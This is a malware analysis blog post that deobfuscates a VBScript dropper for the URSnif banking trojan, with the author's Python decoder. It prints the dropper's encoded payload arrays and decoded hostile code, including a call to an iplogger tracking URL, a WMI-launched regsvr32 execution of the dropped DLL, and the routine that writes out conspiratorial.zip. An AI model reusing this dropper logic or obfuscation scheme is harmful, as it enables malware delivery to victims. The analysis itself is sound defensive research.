Analysis and Deobfuscation of Malicious VBScript URSnif DropperAnalysis and Deobfuscation of Malicious VBScript URSnif Dropper

Introduction

On June 25, 2020 I came across the following Tweet posted by @ps66uk

It appears that the victims received a phishing email with a  link to download a ZIP file through Firefox Send. Upon downloading and extracting this file, it dropped an obfuscated VBScript file named data_90680.vbs (SHA1: c2952cbb31ee98c5c1a676e1820a3c73345083a0) on the system.  Reviewing the execution process of this VBScript file through Anyrun suggests that it is a dropper for a URSnif malware variant. Somewhere along the execution process, this VBScript attempts to register another file named afterbirth.rs using the Windows native regsvr32.exe command:

regsvr32.exe  -s C:\Users\admin\AppData\Local\Temp\afterbirth.rs

The first assumption here is that the file fterbirth.rs is some sort of a DLL file associated with URSnif malware as suggested by the Tweet. In fact, looking at this file through VirusTotal shows that several Anti-Virus (AV) engines already classify this file as the URSnif malware. Though nothing significant about this threat, in my analysis, I did find the VBScript to be interesting because it was obfuscated in an effort to hide its operation during static analysis and review of the code. In addition, it had some Anti-VM operation to prevent it from being analyzed dynamically in a Virtual Machine (VM). After reviewing the obfuscation techniques and with a few Python programming skills in my sleeve, I was able to decode the VBScript to reveal its operation. This blog post will go through details of that deobfuscation process. I will also included a link to my GitHub repo to download those Python scripts I created for the deobfuscation process. I hope you enjoy the content of this post and feel free to provide a feedback on it. 

Code Review of The VBScript Dropper

As mentioned, the file data_90680.vbs is a dropper for the URSnif malware. Upon looking at the content of this file through any text editor, it is obvious that it is obfuscated in an effort to not easily reveal its code and operation. Sifting through the code I noticed that there were patterns for this code obfuscation and few interesting characteristics. These characteristics are:

The use of the VB const (constant) to declare static variables. For example, const cp = 121 or const jC = 154. These variables are used to replace the declared variable with a number that each variable is equal to.

The VBScript also contains garbage remarks and code like the following:

' Ukrainian Pasadena Adelia deciduous absorptive psychopomp tack friable fantasist Melanesia duchess Cuba Fitzroy benefit Melissa hide failsafe decryption mamma aardvark ill chaplain. 5266210 uttermost quern commodity inertance Eulerian tandem complementary love phylogenetic speedboat 
' delusive festoon Schroeder calorie humdrum snapshot doff regalia simultaneous plausible, 8909491 handbook alive Hetty takeover frog sunburn PhD breakdown patrimony crawlspace gypsy mascara pastiche Damocles linoleum SCM Argentina 
' debarring pollution mountainous Bolshevist sinus MacDougall intermittent Sepoy vibrant, Ghanian sublimate significant covariant chord bona wispy disquisition olive trophic company crystal Hollingsworth reproach trompe psychoacoustic spiral diversionary festive

REM fledge mulct Pickman lazybones yah croft Sigmund ran billfold exemplar pant swishy guilt Phyllis alderman. 9476035 Blanche impugn athletic detoxify. hydrofluoric tribal. 4136893 ardent

The attacker added these to inflate the code and make it harder to interoperate what the VBScript does on execution. 

The VBScript also contains two different obfuscated arrays that are fragmented into sections and scattered along the script. Example 1 and Example 2 will explain each obfuscated array.

Example 1:

Those in example 1 are not separated by a space between each value in the array for example, [rE995,Zf]. In addition, there is nothing in the code after each array that can suggest what is happening with the array:

kgQs = Array(nl,VD,rE995,Zf,300,295,Vy62,wc,iY,lX,cp,Kn163,nV130,RE,wc,Ik,70,Vb,56,YF,ph,zo,ZQ,Ta,eT,tB,57,Qa,gA,mZ,FL,UH,uw,yX,xj,kA,jq10,AG,bq,xj,ZQ,HH313,ig,Pw,oF,Dt,Jf,OG599,nS,RQ,xj,ZQ,304,301,NX,58,av,mi436,HX45,ZQ,54,iM,eT,UR,iY,Yr,kA,iY,Qa,CF,vK,OG,Ta,Il,Ez,Sh,Lc,Vb,sB,tj,FP305,AK,Wb,VC,Vb,Il,lS,Cj,FV,Ig492,CF,eb,vL,ix136,fs,Ds,gn,52,wR,50,Wk,Vy62,SK,BJ,303,Pw,hn,YP,Cz,Zs,YH,RQ,YH,ig,rE995,Pt,52,kN,fO,HT,tO350,cR,wV,Yl,rE995,51,af,tH904,RQ392,ig,wV,294,fC726,Ta,iY,66,Bi,mZ,nF,RQ392,294,gp,VD,Ix,Qa,mZ,tX,fZ,66,Hp,qu,Nd,Ut,RQ,jC,CE,jq10,it,iY,CA,nt,gd,lX,VM,ly,ZQ,jC,mZ,af,61,kA,Gs,301,UR,nV,Ta,293,296,Vy,56,Dr,JS,iJ,302,UR,nV,49,ig,gn,52,Fw,58,hx,Zs,mz703,Qy,iY,Zt,49,nB,ig,Lc,fy,eT,ni,59,55,HH313,303,mZ,FV,fZ,af,Pt,YF,bK,57,CA,ay,Pr,vK,UN,ps,55,pr634,53,296,Gi,VC,VX,ph,qy350,nB,YF,YP,uk,301,hx,kN,RQ392,300,dM,300,304,wR)

In example 1, those fragmented arrays are combined together to create a zip file called conspiratorial.zip file. The process of combining them together and the use of this zip file will be discussed later in this blog post. 

Example 2:

Those in example 2 are separated by a space between each value in the array for example, [ZQ, rE995]. In addition, each declared array is followed by the ExecuteGlobal statement: 

KYp = Array(ZQ, rE995, fC726, mz703, kA, jC, Yy, mi, hn, ni, EI, ET208, uk, iY, fZ, Yy, Bi, dM, Bi, VM, 59, ZQ, Bi, Vy, mz703, Zs, vL, pB, ni, mz703, mh, mz703, Rh731, vL, Bi, ni, Vy, Bi, on539, fC726, wR, Bi, gd, Vy, ET208, sq663, ZQ, gd, vL, jC, uk, Vy, jC, Yy, Zs, fc322, HT, jC, YF, Bi, ZQ, EI, hn, Vy, Bi, dM, on539, fC726, wR, Bi, gd, Vy, sq663, VM, 59, ZQ, Bi, Vy, mz703, jC, vL, vL, Bi, hn, fZ, YF, rE995, Vy, jC, fZ, Yy, mz703, mh, mz703, Zs, vL, pB, ni, fc322, on539, uk, Bi, Yy, wg, Bi, lX, Vy, HT, jC, YF, Bi, ET208, uk, iY, fZ, Yy, Bi, dM, Bi, Dt, mz703, ET208, Vw, UN, UN, mz703, pr634, mz703, ET208, ET208, bK, HH313, kN, kN, mz703, pr634, mz703, bK, bK, bK, UN, fc322, Cj, VM, mz703, af, mz703, ET208, Qh, UN, mz703, af, mz703, bK, Qh, fc322, Cj, VM, VM, VM, VM, 59, YH, mz703, AK, YF, rE995, lX, mz703, jC, Yy, AK, Bi, ni, hn, jC, fC726, YF, Bi, mz703, vL, fZ, rE995, Zs, iY, gd, ni, hn, Vy, mz703, gd, rE995, YF, Vy, jC, CF, ni, Vy, Bi, mz703, jC, Yy, wR, rE995, hn, Vy, jC, gd, Bi, mz703, nt, Bi, ni, YF, ni, Yy, mi, mz703, jC, Yy, CF, fZ, gd, ni, Vy, Bi, mz703, hn, EI, Yy, fZ, uk, hn, Bi, hn, mz703, iY, Bi, dM, jC, hn, uk, iY, Bi, vL, Bi, mz703, Zs, jC, ni, Yy, Vy, Dt, mz703, mz703, bw, UN, Cj, Yr, nS, nS, bK, mz703, 59, mZ, lX, Bi, gd, rE995, Vy, Bi, eC, YF, fZ, fC726, ni, YF, mz703, jC, vL, vL, Bi, hn, fZ, YF, rE995, Vy, jC, fZ, Yy, fc322, NX, Bi, ni, mi, fp537, YF, YF, 59, NX, mZ, iM, mz703, AK, jC, vL, Bi, dM, Bi, Yy, mz703, hn, Bi, YF, Bi, Yy, jC, Vy, Bi, mz703, uk, vL, Bi, hn, Bi, Yy, Vy, ni, Vy, jC, fZ, Yy, mz703, wR, fZ, gd, xj, Bi, EI, mz703, fC726, Bi, mi, vL, jC, mi, mi, Bi, Yy, mz703, xj, jC, Yy, xj, HH313, mz703, fC726, Bi, hn, Bi, Vy, mz703, Rh731, fZ, fZ, YF, jC, mi, Zs, Bi, mz703, cp, fZ, uk, xj, jC, Yy, hn, jC, ni, Yy, mz703, ni, YF, YF, fZ, SK, mz703, iM, ni, hn, hn, Bi, EI, fc322, mz703, mz703, UN, UN, Yr, bK, Yr, Vw, bw, mz703, Mu, ni, vL, Vy, fZ, xj, mz703, fC726, YF, Bi, mi, mz703, ni, gd, gd, vL, rE995, ni, YF, mz703, Mu, vL, ni, Yy, mi, fZ, Yy, mz703, fZ, rE995, Vy, YF, ni, SK, vL, EI, mz703, gd, Bi, YF, Bi, fC726, vL, ni, Vy, Bi, mz703, gd, vL, fZ, gd, iY, Bi, Vy, mz703, hn, YF, Bi, SK, mz703, iM, ni, rE995, vL, jC, gd, Bi, mz703, mi, jC, gd, xj, Bi, EI, mz703, dM, ni, Zs, Zs, fZ, Vy, EI, mz703, ZQ, rE995, hn, jC, Bi, mz703, uk, hn, EI, gd, iY, fZ, uk, fZ, dM, uk, nS, Cj, HH313, mz703, Vy, ni, gd, iY, jC, Yy, jC, mi, mz703, 59, jC, vL, vL, Bi, hn, fZ, YF, rE995, Vy, jC, fZ, Yy, fc322, Rh731, YF, fZ, hn, Bi, 59, YH, mz703, hn, Vy, rE995, fC726, mz703, SK, jC, hn, Bi, ni, gd, vL, Bi, mz703, EI, Bi, SK, fc322, mz703, mz703, kN, Cj, Cj, Yr, kN, Cj, nS, mz703, hn, fZ, gd, jC, fZ, dM, Bi, Vy, vL, EI, mz703, vL, Bi, YF, jC, hn, iY, fc322, mz703, ni, vL, Vy, jC, AK, ni, gd, Vy, mz703, ni, vL, fZ, rE995, hn, Bi, mz703, iM, ni, vL, gd, Bi, YF, mz703, Mu, YF, rE995, dM, fc322, mz703, iY, jC, YF, Vy, mz703, YF, fZ, Wb, Bi, Yy, Zs, Bi, mz703, gd, Bi, vL, Vy, ni, jC, Yy, fc322, mz703, uk, Bi, Bi, vL, mz703, 59, ZQ, Bi, Vy, mz703, Zs, vL, pB, ni, mz703, mh, mz703, Kq, fZ, Vy, iY, jC, Yy, Zs, 59, NX, mZ, iM, mz703, mi, rE995, fC726, jC, Vy, ni, fC726, YF, Bi, mz703, gd, fZ, rE995, Yy, Vy, Bi, vL, hn, jC, Yy, xj, mz703, eC, iY, ni, Yy, ni, mz703, YF, ni, SK, dM, ni, Yy, mz703, ps, fC726, Yy, Dt, mz703, mi436, Bi, vL, jC, gd, YF, Bi, hn, mz703, jC, Yy, ni, gd, gd, rE995, vL, ni, Vy, Bi, mz703, dM, Bi, Vy, jC, Bi, vL, mz703, jC, Yy, CF, fZ, jC, gd, Bi, mz703, gd, iY, ni, dM, fZ, dM, jC, YF, Bi, mz703, ni, vL, gd, gd, fZ, hn, jC, Yy, Bi, mz703, iY, ni, EI, SK, ni, vL, mi, mz703, fC726, jC, ni, Yy, gd, fZ, mz703, 59, ZQ, Bi, Vy, mz703, jC, vL, vL, Bi, hn, fZ, YF, rE995, Vy, jC, fZ, Yy, mz703, mh, mz703, Kq, fZ, Vy, iY, jC, Yy, Zs, 59, mZ, Yy, mi, mz703, ZQ, rE995, fC726, 59)
ExecuteGlobal(theme(KYp)):

In example 2, the array is followed by the ExecuteGlobal statement which responsible to execute the array after it was declared. Inside the ExecuteGlobal there is also another call for the theme subroutine that is used as a wrapper to execute the array. At line 82 (in the VBScript when reviewing through the editor), we can see this function:

Function theme(caprice)
for whether = lbound(caprice) to ubound(caprice)
mUb = mUb & ChrW(caprice(whether) - (((70 + 23.0) + 458.0) - (64 + 438.0)))
REM meaningful, spinal felon quirky theist monarchy offertory922, kickback burglary. 3545584 innocent Mayo Scarborough, fluorite Lenny Nippon. hong carcass, cambric 
Next
theme = mUb
End Function

In a nutshell, this function is responsible to mathematically calculate the number in the array.  For example, each number is passed to this function and then manipulated by  + (((70 + 23.0) + 458.0) – (64 + 438.0))) which is then equal to a new number. Then each new number is added to the array as an ASCII char. The results in the new array is then executed by the ExecuteGlobal call. Let’s go through one example to emphasize this process.  Here is a small array from the VBScript code:

RrrtMa = Array(HT, rE995, Yy, gd, Vy, jC, fZ, Yy, mz703, uk, ni, Vy, gd, iY, SK, fZ, vL, xj, ET208, Yy, fZ, Yy, gd, iY, ni, YF, ni, Yy, Vy, Dt, mz703, ZQ, RE, VM, 59, Rh, jC, dM, mz703, Yy, ps, Vy, Dt, mz703, lX, Wk, HH313, Vw, Vw, 59, YH, mz703, Zs, vL, jC, dM, Bi, Dt, mz703, uk, jC, Bi, gd, Bi, mz703, ni, Vy, vL, fZ, uk, iY, EI, mz703, jC, gd, Bi, YF, ni, Yy, mi, mz703, fC726, jC, gd, fZ, Yy, Yy, Bi, gd, Vy, Bi, mi, mz703, gd, fZ, dM, uk, ni, gd, Vy, jC, AK, EI, mz703, cp, jC, vL, fZ, hn, iY, jC, dM, ni, mz703, SK, ni, xj, Bi, mz703, ni, YF, YF, Bi, Zs, Bi, bK, nS, kN, mz703, ZQ, ZQ, mZ, mz703, it, fZ, uk, uk, Bi, vL, hn, mz703, iY, Bi, ni, vL, Vy, vL, Bi, Yy, mi, jC, Yy, Zs, mz703, Vy, iY, Bi, fZ, YF, fZ, Zs, EI, mz703, kA, jC, fZ, Yy, Bi, YF, mz703, AK, YF, fZ, rE995, vL, mz703, jC, dM, dM, Bi, vL, hn, Bi, mz703, rE995, Yy, ni, vL, EI, mz703, mi436, vL, fZ, gd, EI, fZ, Yy, mz703, iY, fZ, fZ, hn, Bi, Zs, fZ, SK, mz703, Bi, dM, fC726, Bi, vL, mz703, rE995, uk, Zs, vL, ni, mi, Bi, mz703, mi, Bi, gd, fZ, YF, YF, jC, dM, ni, Vy, Bi, mz703, gd, iY, fZ, hn, Bi, mz703, vL, Bi, CF, fZ, gd, ni, fC726, YF, Bi, mz703, CF, fZ, SK, mz703, fp537, vL, gd, ni, mi, jC, ni, mz703, iM, fZ, Yy, Vy, jC, gd, Bi, YF, YF, fZ, Dt, mz703, mz703, kN, Qh, Qh, nS, nS, HH313, mz703, hn, uk, YF, jC, Yy, Vy, mz703, Rh, vL, Bi, EI, AK, rE995, hn, hn, Dt, mz703, Rh, vL, ni, gd, fZ, Yy, jC, ni, Yy, mz703, gd, fZ, jC, Yy, gd, jC, mi, Bi, Yy, Vy, ni, YF, fc322, mz703, mz703, kN, Vw, Vw, UN, Vw, bw, bK, mz703, Bi, YF, Bi, Zs, EI, mz703, SK, ni, vL, uk, mz703, jC, Yy, gd, fZ, Yy, hn, Bi, cR, rE995, Bi, Yy, Vy, jC, ni, YF, mz703, Bi, lX, Vy, vL, ni, CF, ni, Zs, ni, Yy, Wb, ni, mz703, 59, ZQ, Bi, Vy, mz703, Yy, ps, Vy, mz703, mh, mz703, Rh731, vL, Bi, ni, Vy, Bi, on539, fC726, wR, Bi, gd, Vy, ET208, sq663, ZQ, gd, vL, jC, uk, Vy, jC, Yy, Zs, fc322, HT, jC, YF, Bi, ZQ, EI, hn, Vy, Bi, dM, on539, fC726, wR, Bi, gd, Vy, sq663, VM, 59, YH, mz703, uk, rE995, vL, jC, Vy, ni, Yy, jC, gd, mz703, hn, xj, Bi, Vy, gd, iY, uk, ni, mi, mz703, Vy, fZ, ni, mi, EI, mz703, NX, fZ, Bi, Yy, Vy, Zs, Bi, Yy, mz703, fC726, fZ, fZ, xj, hn, Vy, fZ, vL, Bi, mz703, hn, uk, vL, fZ, gd, xj, Bi, Vy, Dt, mz703, hn, fZ, vL, vL, fZ, SK, AK, rE995, YF, mz703, iM, ni, EI, AK, YF, fZ, SK, Bi, vL, mz703, 59, ZQ, Bi, Vy, mz703, lX, Wk, HH313, Vw, Vw, mz703, mh, mz703, Yy, ps, Vy, fc322, Rh731, vL, Bi, ni, Vy, Bi, wg, Bi, lX, Vy, HT, jC, YF, Bi, ET208, Yy, fZ, Yy, gd, iY, ni, YF, ni, Yy, Vy, Dt, mz703, wg, vL, rE995, Bi, VM, 59, Rh, jC, dM, mz703, AK, YF, ni, Yy, Zs, Bi, wc, mz703, AK, YF, ni, Yy, Zs, Bi, mz703, mh, mz703, ET208, ET208, UN, HH313, mz703, af, mz703, ET208, ET208, Cj, VM, mz703, af, mz703, UN, bK, bw, fc322, Cj, VM, VM, mz703, pr634, mz703, ET208, Vw, bw, Vw, mz703, pr634, mz703, Vw, Vw, fc322, Cj, VM, VM, 59, Rh, jC, dM, mz703, gp, Rh, hn, kA, wc, mz703, gp, Rh, hn, kA, mz703, mh, mz703, ET208, ET208, Vw, mz703, af, mz703, ET208, bK, nS, mz703, af, mz703, ET208, pr634, ET208, Qh, Vw, bw, UN, mz703, pr634, mz703, Qh, Vw, Yr, HH313, fc322, Cj, VM, VM, VM, VM, mz703, pr634, mz703, kN, UN, fc322, Cj, VM, 59, HT, fZ, vL, mz703, mZ, ni, gd, iY, mz703, dM, pB, fC726, mz703, ps, Yy, mz703, ZQ, RE, 59, NX, ni, Yy, mi, fZ, dM, jC, Wb, Bi, 59, AK, YF, jC, Yy, Zs, mz703, mh, mz703, ps, Yy, Vy, ET208, ET208, AK, YF, ni, Yy, Zs, Bi, pr634, gp, Rh, hn, kA, af, Yr, VM, vR, NX, Yy, mi, af, gp, Rh, hn, kA, VM, 59, ps, AK, mz703, AK, YF, jC, Yy, Zs, mz703, tn, mz703, ET208, ET208, ET208, Vw, bK, mz703, af, mz703, HH313, UN, fc322, Cj, VM, mz703, af, mz703, ET208, pr634, Yr, bK, fc322, Cj, VM, VM, mz703, af, mz703, ET208, nS, mz703, af, mz703, HH313, fc322, Cj, VM, VM, mz703, wg, iY, Bi, Yy, 59, lX, Wk, HH313, Vw, Vw, fc322, oF, vL, jC, Vy, Bi, kA, jC, Yy, Bi, ET208, dM, pB, fC726, VM, 59, mZ, YF, hn, Bi, ps, AK, mz703, AK, YF, jC, Yy, Zs, mz703, tX, mz703, ET208, nS, UN, mz703, af, mz703, ET208, Vw, UN, mz703, af, mz703, ET208, pr634, ET208, bw, Cj, mz703, pr634, mz703, ET208, Qh, HH313, HH313, mz703, pr634, mz703, Qh, bK, kN, fc322, Cj, VM, VM, VM, VM, VM, mz703, fp537, Yy, mi, mz703, AK, YF, jC, Yy, Zs, mz703, tn, mz703, ET208, nS, UN, mz703, af, mz703, ET208, Vw, UN, mz703, af, mz703, ET208, pr634, ET208, bw, Cj, mz703, pr634, mz703, ET208, Qh, HH313, HH313, mz703, pr634, mz703, Qh, bK, kN, fc322, Cj, VM, VM, VM, VM, VM, mz703, wg, iY, Bi, Yy, 59, lX, Wk, HH313, Vw, Vw, fc322, oF, vL, jC, Vy, Bi, mz703, dM, pB, fC726, mz703, af, mz703, sq663, wc, sq663, 59, mZ, YF, hn, Bi, 59, lX, Wk, HH313, Vw, Vw, fc322, oF, vL, jC, Vy, Bi, mz703, dM, pB, fC726, 59, lX, Wk, HH313, Vw, Vw, fc322, oF, vL, jC, Vy, Bi, Mu, YF, ni, Yy, xj, kA, jC, Yy, Bi, hn, ET208, ET208, HH313, Vw, mz703, pr634, mz703, ET208, ET208, bw, Qh, Cj, HH313, mz703, pr634, mz703, ET208, Yr, Yr, UN, nS, Qh, mz703, pr634, mz703, Qh, HH313, Vw, nS, fc322, Cj, VM, VM, mz703, pr634, mz703, nS, bK, HH313, fc322, Cj, VM, VM, VM, 59, mZ, Yy, mi, mz703, ps, AK, 59, Kq, Bi, lX, Vy, 59, lX, Wk, HH313, Vw, Vw, fc322, Rh731, YF, fZ, hn, Bi, 59, mZ, Yy, mi, mz703, HT, rE995, Yy, gd, Vy, jC, fZ, Yy, 59)
ExecuteGlobal(theme(RrrtMa))

I have created a Python script to help with the decoding of this array. Using the following Python script can help to decode the array: 

af = 92
AG = 233
AK = 151
av = 113
aX = 259
ax809 = 272
ay = 281
aZ = 211
Bi = 150
bi563 = 195
BJ = 239
Bj418 = 288
bK = 103
bO = 189
bq = 206
bw = 100
bX = 145
CA = 191
CE = 185
CF = 167
Cj = 97
Cn = 144
<SNIP SNIP>
xj = 156
xl = 196
YA = 216
YF = 157
YH = 88
Yl = 225
YP = 269
Yr = 98
yX = 210
Yy = 159
Zf = 283
zo = 205
ZQ = 132
Zs = 152
Zt = 250

def convert(array):
	Remember = []
	for line in array:
		if line:
			line = (int(line) - (((70 + 23.0) + 458.0) - (64 + 438.0)))
			Remember.append(int(line))

	RememberTwo = []
	for line in Remember:
		newline = chr(int(line))
		RememberTwo.append(newline)
	return RememberTwo

RememberAll = []
SaveToFile = open('output.vbs', 'w')
array = [HT, rE995, Yy, gd, Vy, jC, fZ, Yy, mz703, RE, Wb, cp, ET208, VM, 59, ps, AK, mz703, ET208, ps, Yy, ZQ, Vy, vL, ET208, oF, ZQ, gd, vL, jC, uk, Vy, fc322, ZQ, gd, vL, jC, uk, Vy, Kq, ni, dM, Bi, Dt, mz703, sq663, wg, mZ, ZQ, wg, ps, Kq, eC, sq663, VM, mz703, tX, mz703, Cj, VM, mz703, wg, iY, Bi, Yy, 59, YH, mz703, mZ, fC726, Bi, Yy, mz703, mi436, iY, jC, YF, YF, jC, uk, mz703, dM, jC, dM, Bi, hn, jC, hn, mz703, Mu, fZ, vL, jC, hn, mz703, dM, ni, Yy, uk, fZ, SK, Bi, vL, fc322, mz703, Yy, ni, Vy, jC, fZ, Yy, mz703, ni, Zs, rE995, Bi, mz703, gd, iY, jC, Yy, gd, iY, mz703, iY, rE995, iY, mz703, fZ, uk, uk, vL, Bi, hn, hn, fZ, vL, mz703, iM, fZ, iY, ni, dM, dM, Bi, mi, ni, Yy, mz703, uk, fZ, YF, YF, fZ, gd, xj, mz703, Yy, ni, vL, gd, fZ, Vy, jC, gd, fc322, mz703, ZQ, ni, dM, mz703, gd, jC, vL, gd, YF, Bi, Vy, mz703, Rh731, ni, vL, uk, ni, Vy, iY, jC, ni, mz703, gd, iY, ni, Yy, Zs, Bi, mz703, xj, Yy, Bi, Bi, YF, mz703, dM, Bi, hn, Vy, jC, Wb, fZ, mz703, uk, Bi, Yy, Vy, Bi, gd, fZ, hn, Vy, ni, YF, Dt, mz703, jC, Yy, AK, YF, Bi, lX, jC, fC726, YF, Bi, mz703, hn, gd, iY, fZ, fZ, YF, dM, ni, vL, dM, mz703, ni, gd, Vy, jC, Yy, jC, mi, Bi, mz703, Kq, fZ, Bi, Vy, iY, Bi, vL, jC, ni, Yy, mz703, on539, vL, Vy, Bi, Zs, ni, Dt, mz703, uk, jC, Yy, lX, Vy, Bi, vL, mz703, 59, mZ, lX, jC, Vy, mz703, HT, rE995, Yy, gd, Vy, jC, fZ, Yy, 59, mZ, Yy, mi, mz703, ps, AK, 59, uk, vL, jC, Yy, gd, jC, uk, ni, YF, ET208, sq663, iY, Vy, Vy, uk, hn, wc, sF531, sF531, jC, uk, YF, fZ, Zs, Zs, Bi, vL, fc322, fZ, vL, Zs, sF531, Yr, fC726, mi436, UN, bK, HH313, sq663, VM, 59, YH, mz703, hn, jC, dM, jC, YF, jC, Vy, rE995, mi, Bi, mz703, Bi, vL, Zs, ni, Vy, jC, CF, Bi, mz703, jC, hn, bK, HH313, kN, mz703, YF, fZ, fC726, ni, vL, mz703, YF, ni, Vy, jC, Vy, rE995, mi, jC, Yy, ni, YF, mz703, iY, Bi, vL, Bi, ni, AK, Vy, Bi, vL, mz703, kA, ni, Zs, rE995, Bi, vL, vL, Bi, mz703, vL, jC, mi, jC, gd, rE995, YF, Bi, fc322, mz703, gd, fZ, CF, ni, vL, jC, ni, Yy, Vy, kN, nS, mz703, AK, vL, rE995, jC, Vy, AK, rE995, YF, mz703, Zs, vL, jC, hn, Vy, dM, jC, YF, YF, mz703, mi436, ni, hn, fZ, mz703, Vy, vL, Bi, Yy, mi, mz703, iY, EI, uk, fZ, Vy, iY, Bi, Vy, jC, gd, fc322, mz703, mz703, Yr, nS, bw, UN, Qh, Vw, Cj, mz703, uk, ni, mi, vL, Bi, mz703, mi, fZ, SK, Yy, uk, fZ, rE995, vL, mz703, eC, rE995, Vy, Bi, Yy, fC726, Bi, vL, Zs, fc322, mz703, YF, jC, Vy, dM, rE995, hn, mz703, CF, Bi, vL, ni, gd, jC, Vy, EI, mz703, jC, Yy, mi, jC, Zs, Bi, Yy, Vy, mz703, ZQ, Vy, rE995, Vy, Vy, Zs, ni, vL, Vy, mz703, hn, Vy, ni, rE995, Yy, gd, iY, mz703, NX, rE995, mi, EI, mz703, gd, iY, jC, gd, xj, Bi, Yy, mz703, SK, iY, jC, vL, mz703, Vy, iY, vL, fZ, dM, fC726, fZ, hn, jC, hn, mz703, hn, fZ, dM, fC726, Bi, vL, mz703, Wb, Bi, hn, Vy, EI, mz703, jC, dM, uk, fZ, hn, hn, jC, fC726, YF, Bi, mz703, uk, vL, EI, mz703, hn, fZ, rE995, Vy, iY, uk, ni, SK, mz703, mi, fZ, hn, Bi, mz703, ZQ, rE995, hn, jC, Bi, bK, UN, Qh, mz703, dM, Bi, YF, ni, Yy, gd, iY, fZ, YF, EI, mz703, 59, ZQ, Bi, Vy, mz703, Bi, EI, Bi, YF, jC, mi, ZQ, Bi, vL, CF, jC, gd, Bi, mz703, mh, mz703, eC, Bi, Vy, on539, fC726, wR, Bi, gd, Vy, ET208, sq663, SK, jC, Yy, dM, Zs, dM, Vy, hn, wc, oF, jC, Yy, bw, Vw, Cn, mi436, vL, fZ, gd, Bi, hn, hn, sq663, VM, 59, NX, mZ, iM, mz703, dz, ni, YF, Bi, mz703, dM, ni, hn, hn, jC, AK, Dt, mz703, mz703, nS, nS, kN, Vw, nS, HH313, bK, mz703, iY, EI, uk, Bi, vL, fC726, fZ, YF, fZ, jC, mi, ni, YF, mz703, Vy, iY, Bi, vL, Bi, Vy, fZ, mz703, iY, fZ, hn, Vy, Bi, YF, vL, EI, mz703, EI, fZ, rE995, vL, hn, Bi, YF, CF, Bi, hn, mz703, fZ, gd, Vy, jC, YF, YF, jC, fZ, Yy, mz703, 59, Bi, EI, Bi, YF, jC, mi, ZQ, Bi, vL, CF, jC, gd, Bi, fc322, Rh731, vL, Bi, ni, Vy, Bi, mz703, sq663, vL, Bi, Zs, hn, CF, vL, bw, Vw, sq663, mz703, af, mz703, sq663, mz703, pr634, hn, mz703, sq663, mz703, af, mz703, Wk, mi436, jC, mz703, af, mz703, sq663, ni, AK, Vy, Bi, vL, fC726, jC, vL, Vy, iY, fc322, vL, hn, sq663, mz703, af, mz703, sq663, sq663, 59, uk, Bi, hn, Vy, YF, Bi, 59, mZ, Yy, mi, mz703, HT, rE995, Yy, gd, Vy, jC, fZ, Yy, 59] array = convert(array) array = (''.join(array)+'\n') RememberAll.append(array) for line in RememberAll: #if "REM" not in line: print(line) SaveToFile.write(line) SaveToFile.close()

The deobfuscated results should look like the following code:

Function VzH()
If (InStr(WScript.ScriptName, "TESTING") > 0) Then
' Eben Phillip mimesis Boris manpower. nation ague chinch huh oppressor Mohammedan pollock narcotic. Sam circlet Carpathia change kneel mestizo pentecostal, inflexible schoolmarm actinide Noetherian Ortega, pinxter
Exit Function
End If
principal("https://iplogger.org/1bP467")
' similitude ergative is675 lobar latitudinal hereafter Laguerre ridicule. covariant59 fruitful gristmill Paso trend hypothetic. 1934820 padre downpour Gutenberg. litmus veracity indigent Stuttgart staunch Rudy chicken whir thrombosis somber zesty impossible pry southpaw dose Susie648 melancholy
Set eyelidService = GetObject("winmgmts:Win32_Process")
REM Yale massif, 9952976 hyperboloidal thereto hostelry yourselves octillion
eyelidService.Create "regsvr32" + " -s " + JPi + "afterbirth.rs" + ""
pestle
End Function

Using this method you can convert all the arrays in the obfuscated script into a meaningful code that is much easier to read later to understand what the VBScript does on execution. Please refer to the following Github link where I uploaded the script I created to do it for all arrays:

https://github.com/taogoldi/Decoders/blob/master/ursnif_afterbirth/convertToVBScript.py

Reconstructing the conspiratorial.zip file

As mentioned, example 1 is responsible for dropping on the affected system a file called conspiratorial.zip. However, these arrays in example 1 are referenced inside one of the functions that are decoded in the arrays from example 2. The following function is where the file conspiratorial.zip is created and dropped in the system:

Function bSaOA()
Dim pGwpq
REM nose acrimonious inspect contentious histidine dahlia lunatic bovine offload immobile Vreeland pecuniary 
Set pGwpq = CreateObject("ADODB.Stream")
With pGwpq
REM parlay infarct stadium sprint household stableman 
.Type = 2
.Charset = "ISO-8859-1"
.Open()
For Each ooZ in Array(BeYL, kgQs, rh576, tDb, hm, Dt2, jjGp, Ui, HAse, hXXM, bqH, doH, OnKb, oYd, qp, HUd, NRH, dRj, HyOP, dPaZ, mA, vtuJ, ToC, Td, BR, vym, Zr, WxY, kr, Gvow, Cw, dB, uI755, qW, jkg, dUi, uDD, nsai, jJzI, fne, JX, mo114, uk987, ynLl, znq, suCJ, cA226, ap, iUgS, OF803, NZM, HK174, AqJ, XJe, Ef, IzAx, YLYn, Ng, hj798, dN, xi, JF657, xPZb, FX886, jXB, wknF, un829, OPJ, au, MgWY, qS, zVf, hRO, vx377, nhaP, hNH, shHB, JCfm, lJu, vk475, hdB, Ua330, vLIr, MDfB, GgG, OpCC, srjm, dy, BDg, PzvE, co, PJLf, qw73, DUrV, GtM, tU, sE, iC, kmw, Tq, pg418, wi, Zn, gYEx, DYy, OJcM, Hoxu, ad, gH, DY343, hHg, MS, KXF, yLWw, reYQ, CZC, ac, tR, nfk, nZH, qUu, Tkw, uZ, XwZs, QXyd, Gq, AHt, xtw, pnIG, IMDQ, wU, RnuC, LwEZ, gQ574, vjf, HRad, sa, BJJ, Hg594, OMf, ksg, XTF, Mrl, cCar, Ksj, pUjq, jj, yia, Dqo, WWkz, vYA, TYPv, FjUn, yNod, iHC, VOy, ans, WT612, ulok, Um, Apk, IdE, nlR, zu, GfhM, EC850, JAJ, SKq, nu, sib, KVE, jHGP, EWa, Kbbw, TM, RGO, Oo)
.WriteText theme(ooZ)
Next
.Position = 0
.SaveToFile JPi + "conspiratorial.zip", 2
.Close
End With
End Function

As you can see in the function above there is a for each loop that reads declared variables from inside an array. Each one of these declared variables in the for each loop array is its own array as seen in example 1. For example, here is the array for the variable BeYL (the first variable from the loop above):

